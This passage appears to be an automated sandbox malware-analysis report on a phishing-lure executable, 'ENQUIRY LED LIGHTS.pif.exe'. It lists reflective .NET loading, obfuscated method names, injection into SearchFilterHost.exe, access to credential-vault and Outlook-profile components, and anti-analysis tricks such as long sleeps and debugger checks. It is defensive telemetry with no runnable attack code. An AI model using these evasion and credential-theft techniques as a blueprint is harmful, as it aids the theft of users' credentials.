            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bdtKgWWjtPR.exe, 00000007.00000000.1985350968.00000000001AE000.00000002.00000001.01000000.0000000C.sdmp, bdtKgWWjtPR.exe, 00000009.00000000.2288490724.00000000001AE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: ENQUIRY LED LIGHTS.pif.exe, 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2075226084.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2085919169.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: SearchFilterHost.pdbUGP source: bdtKgWWjtPR.exe, 00000007.00000002.2976848441.0000000001208000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ENQUIRY LED LIGHTS.pif.exe, ENQUIRY LED LIGHTS.pif.exe, 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, SearchFilterHost.exe, 00000008.00000003.2075226084.0000000004DEC000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.00000000052DE000.00000040.00001000.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000003.2085919169.0000000004F90000.00000004.00000020.00020000.00000000.sdmp, SearchFilterHost.exe, 00000008.00000002.2977357150.0000000005140000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: SearchFilterHost.pdb source: bdtKgWWjtPR.exe, 00000007.00000002.2976848441.0000000001208000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, P9I1LQRf00da55U6ir.cs.Net Code: Ul94V86DQW System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.50e0000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.36f8e68.1.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.3718e88.3.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.9b80000.6.raw.unpack, P9I1LQRf00da55U6ir.cs.Net Code: Ul94V86DQW System.Reflection.Assembly.Load(byte[])
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4193c28.4.raw.unpack, P9I1LQRf00da55U6ir.cs.Net Code: Ul94V86DQW System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00448B5B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_00448B5B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 0_2_00CEEFB0 push eax; iretd 0_2_00CEEFB1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0040C8BA push ds; retf 3_2_0040C8BE
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0040D9D5 push ds; iretd 3_2_0040D9D6
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0040219E push eax; ret 3_2_004021A1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00412A52 push cs; ret 3_2_00412A59
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0041B342 push ecx; ret 3_2_0041B345
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0041235F push ecx; retf 3_2_00412380
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00414364 push ebx; retf 3_2_004143BC
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00403C5C push eax; ret 3_2_00403C5E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0040DC07 push dword ptr [eax]; iretd 3_2_0040DC12
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004054D7 push esi; retf 3_2_004054EA
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004054DF push esi; retf 3_2_004054EA
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00416D61 push esi; ret 3_2_00416D62
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00418516 push edi; iretd 3_2_0041852A
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00416E82 push cs; retf 3_2_00416E8D
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00401EB4 push ss; iretd 3_2_00401EB5
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_004057F8 push ds; iretd 3_2_004057F9
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00447F95 push ecx; ret 3_2_00447FA8
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F109AD push ecx; mov dword ptr [esp], ecx3_2_02F109B6
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04149C12 push ds; iretd 7_2_04149C13
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_041634BA push cs; retf 7_2_041634C6
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04150CD4 push ds; retf 7_2_04150CD8
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04151DEF push ds; iretd 7_2_04151DF0
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04156E6C push cs; ret 7_2_04156E73
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_0415F75C push ecx; ret 7_2_0415F75F
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_0415877E push ebx; retf 7_2_041587D6
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04156779 push ecx; retf 7_2_0415679A
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_04152021 push dword ptr [eax]; iretd 7_2_0415202C
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_041498F1 push esi; retf 7_2_04149904
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_041498F9 push esi; retf 7_2_04149904
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exeCode function: 7_2_0415C930 push edi; iretd 7_2_0415C944
            Source: ENQUIRY LED LIGHTS.pif.exeStatic PE information: section name: .text entropy: 7.630840846842573
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, nLR3bA80hJ4wspDwYO.csHigh entropy of concatenated method names: 'ffySd8hM0Y', 'HiOSgk6OuU', 'aS7SFRKc1d', 'wZFSOkMuqb', 'U68SxWTnEC', 'KwFS5Rojta', 'fFMuexB9TWqlJvu7Jo', 'st9qdyc4jMVkvrHf9X', 'lbeLZtMS3SAn02kyWU', 'WrJSSYKtVF'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, j2vSbIzuip2Doe0AA1.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LxQm7vXSZ6', 'DrTmx2LX6o', 'w0km5q8Vfx', 'TFmmWDHG68', 'LiAmRJqrNv', 'ygdmmQDebb', 'x3dmBBCnAu'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, fcVU1grtFVPAvdmFEO.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'mvNHp1HGsV', 'Xr4HqlmIeT', 'gXlHzqJNEV', 'AlqaT3R3jC', 'FTwaSVftyq', 'gbiaHMcZlI', 'spaaagIUDH', 'XswJhdlDx8iEv1BAnFG'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, g78YtbvSAnGYotjs65.csHigh entropy of concatenated method names: 'bq5oNFZL2R', 'gvmoMndr5M', 'O5eo0RhYWK', 'OoxoeHWZjs', 'R1aox7D7fu', 'J0Wo5u4Vdy', 'A4ioWNc7el', 'oPboRmSWdS', 'NQ0omvWIpd', 'lUXoBKnwPF'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, KIl1hf45qAvMav4dpU.csHigh entropy of concatenated method names: 'mEUxs0u7FT', 'uo3xjDjvI8', 'K3exhF0HYq', 'V8GxPoZf2k', 'dcJxXv9w3r', 'VOYxLevlP1', 'hVrxYTBv2v', 'YsixyKiofY', 'pFwx22sQa1', 'oGPxc0fGKg'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, tk9fVfH5iSssd1Iuq3.csHigh entropy of concatenated method names: 'Vt470ExZUO', 'uwf7e1CjJY', 'bGH7IAvE6e', 'xFY7XQ176P', 'gwA7YyP94N', 'JkQ7yFTWua', 'eKL7cYaC4T', 'BNb7iYoSVg', 'LRm7sOGUbZ', 'ufI7KXoBCH'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, MJqHXZggeHIDrjZqM8.csHigh entropy of concatenated method names: 'kdRdJpFpNP', 'ofwdDFRXhL', 'kVMdV5Tv9Z', 'K54dNNJZUR', 'eNwd6HXI4p', 'oFudMdQtok', 'SJld82xGE1', 'IwLd0DDlfc', 'tnodess885', 'vqGdCoHfpb'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, C6pYrh05IGfcUbyG3L.csHigh entropy of concatenated method names: 'pOZRIZkaV1', 'Dq0RXTTOTs', 'S42RL1BYLH', 'H0bRYbR3Ar', 'Q9fRhUofC0', 'FxuRyFcETj', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, awBbSNVR1ZSedZn6vX.csHigh entropy of concatenated method names: 'jSxmS0WHJH', 'RYVmaCviaC', 'xOVm41xh3A', 'fhPmvMDT2g', 'AfPmUErPWT', 'tFkmkwqdCk', 'Ubemr9qT3i', 'tK3Rb3QeG4', 'LPERfY0ZQl', 'FxiRpqtRCe'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, pGriIKtV0meYym5cfu.csHigh entropy of concatenated method names: 'mcXWfBOLOC', 'mwMWqmRUgV', 'QD2RTQOIpl', 'koxRSa7IVS', 'zPvWKD7iEd', 'PeRWjR3jmP', 'kf4WGpdZeJ', 'XZmWhKffgO', 'fMQWPLtd5y', 'RGEWlC3hyZ'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, zCdZB2IyVxidTBWpWC.csHigh entropy of concatenated method names: 'PAbUhdTVyo', 'poUUP5qYH7', 'tbnUlV8KDa', 'tcqUtiTeWH', 'mioUQpgilx', 'po5UESVjen', 'ekrUb2LgdE', 'IgVUfxDkoc', 'IsvUpnxKJy', 'w7ZUqXiTOk'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, P9I1LQRf00da55U6ir.csHigh entropy of concatenated method names: 'Fr3awjqXOM', 'llMavBwPKk', 'YdaaUjRbkw', 'LgMaoAhQM6', 'EahakSW4ES', 'wSSarM8maF', 'BWDadClimu', 'ymxagewSGP', 'rJqa3mcGqy', 'VnaaFkiivw'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, VoGKZkmcFQfRYiAx9v.csHigh entropy of concatenated method names: 's3PrwrEOZd', 'jbPrUj5TW7', 'EosrkHiGK0', 'CSBrdk4yN4', 'WFyrgdGgX4', 'b1SkQ4yo4S', 'i2YkEkiBkO', 'AhxkbtRrCf', 'SuokfDbyBa', 'pVkkpAJWLq'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, Fnk7iidicNbWyXGiQpt.csHigh entropy of concatenated method names: 'bRsmJ705d2', 'eg6mDDCufo', 'LqXmVXvFy7', 'F1ImNK6XuC', 'qqDm6bHG9x', 'LLCmMwwDNN', 'zV2m8WtiR1', 'L8im0FIkKk', 'LBxme6ZtsY', 'gktmCvH7Xb'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, ta0jagdddddL9UFCV5V.csHigh entropy of concatenated method names: 'ToString', 'M9dBa6SCtb', 'rSGB42C2dH', 'kaUBwaaKPy', 'LLrBvWNplo', 'APkBUcDALx', 'E07Bod73jP', 'zQWBkE2hVC', 'ym3DAdR8Q2RPZsy13ES', 'yrlG2ERwUT4tUlJYW6L'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, JjXEOud2tpryD05P0iy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hrgBhXOPkm', 'lccBPTOSMH', 'fUqBlywT2W', 'XpIBtj2Nlv', 'N53BQmkMXO', 'CJYBEETh23', 'jNIBbQA5vJ'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, gLSqvkwK26E24TpbqO.csHigh entropy of concatenated method names: 'dV6VxPgxH', 'lh3NP17mM', 'Xl0MADqPh', 'Rwk8ysWUJ', 'TFneD4lZY', 'T1AChpiKS', 'LkNOKp8edTC8VcJh2P', 'vpcuNJwSjCGnMPTppF', 'p4AR5qm1e', 'h6pBisSBS'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, jdZGL2oOZSYUKaCTD5.csHigh entropy of concatenated method names: 'i3dRvW9cvJ', 'fOGRUu7j5d', 'gijRoPtdgO', 'lelRkrPtHW', 'PDeRrZh7q0', 't17RdARKVx', 'mN7Rgha0sj', 'kpYR3qYs3n', 'OnaRFWKy0u', 'jZkROO4Im8'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, HYnt06Oc4HTad2fcJ8.csHigh entropy of concatenated method names: 'bcYdvV6nYa', 'XeGdofkAAY', 'RHXdr59f6E', 'zK2rq3BGGn', 'nparzakC6r', 'NkldTeUi6b', 'XgddSIBcqq', 'jNRdHYM2fs', 'K76dabiFdO', 'ESYd43laRo'
            Source: 0.2.ENQUIRY LED LIGHTS.pif.exe.4227448.0.raw.unpack, sYronPkJY2qAxmeuZo.csHigh entropy of concatenated method names: 'Dispose', 'WeeSpdh2i7', 'SCKHXeUQ6g', 'fnc11rBEvq', 'JRmSqF4hhM', 'lFhSzOUyld', 'ProcessDialogKey', 'lpTHTOR9pN', 'ut8HSWsGG9', 'uXNHHIRYVf'
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: ENQUIRY LED LIGHTS.pif.exe PID: 7288, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: CE0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 26D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: D20000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 77D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 87D0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 8990000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 7070000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: 9C20000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: AC20000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeMemory allocated: BC20000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F5096E rdtsc 3_2_02F5096E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeWindow / User API: threadDelayed 3772
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeWindow / User API: threadDelayed 6199
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe TID: 7308Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe TID: 7972Thread sleep count: 3772 > 30
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe TID: 7972Thread sleep time: -7544000s >= -30000s
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe TID: 7972Thread sleep count: 6199 > 30
            Source: C:\Windows\SysWOW64\SearchFilterHost.exe TID: 7972Thread sleep time: -12398000s >= -30000s
            Source: C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe TID: 8024Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeCode function: 8_2_032AC410 FindFirstFileW,FindNextFileW,FindClose,8_2_032AC410
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeThread delayed: delay time: 922337203685477
            Source: SearchFilterHost.exe, 00000008.00000002.2975886564.000000000344A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2577102278.00000161BC1CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: bdtKgWWjtPR.exe, 00000009.00000002.2976367299.0000000000C3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F5096E rdtsc 3_2_02F5096E
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00417F8F LdrLoadDll,3_2_00417F8F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00446B64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00446B64
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_00448B5B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_00448B5B
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F202E1 mov eax, dword ptr fs:[00000030h]3_2_02F202E1
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F1A2C3 mov eax, dword ptr fs:[00000030h]3_2_02F1A2C3
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F202A0 mov eax, dword ptr fs:[00000030h]3_2_02F202A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA62A0 mov eax, dword ptr fs:[00000030h]3_2_02FA62A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FA62A0 mov ecx, dword ptr fs:[00000030h]3_2_02FA62A0
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E284 mov eax, dword ptr fs:[00000030h]3_2_02F4E284
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F4E284 mov eax, dword ptr fs:[00000030h]3_2_02F4E284
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F90283 mov eax, dword ptr fs:[00000030h]3_2_02F90283
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F90283 mov eax, dword ptr fs:[00000030h]3_2_02F90283
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02F90283 mov eax, dword ptr fs:[00000030h]3_2_02F90283
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_02FC0274 mov eax, dword ptr fs:[00000030h]3_2_02FC0274
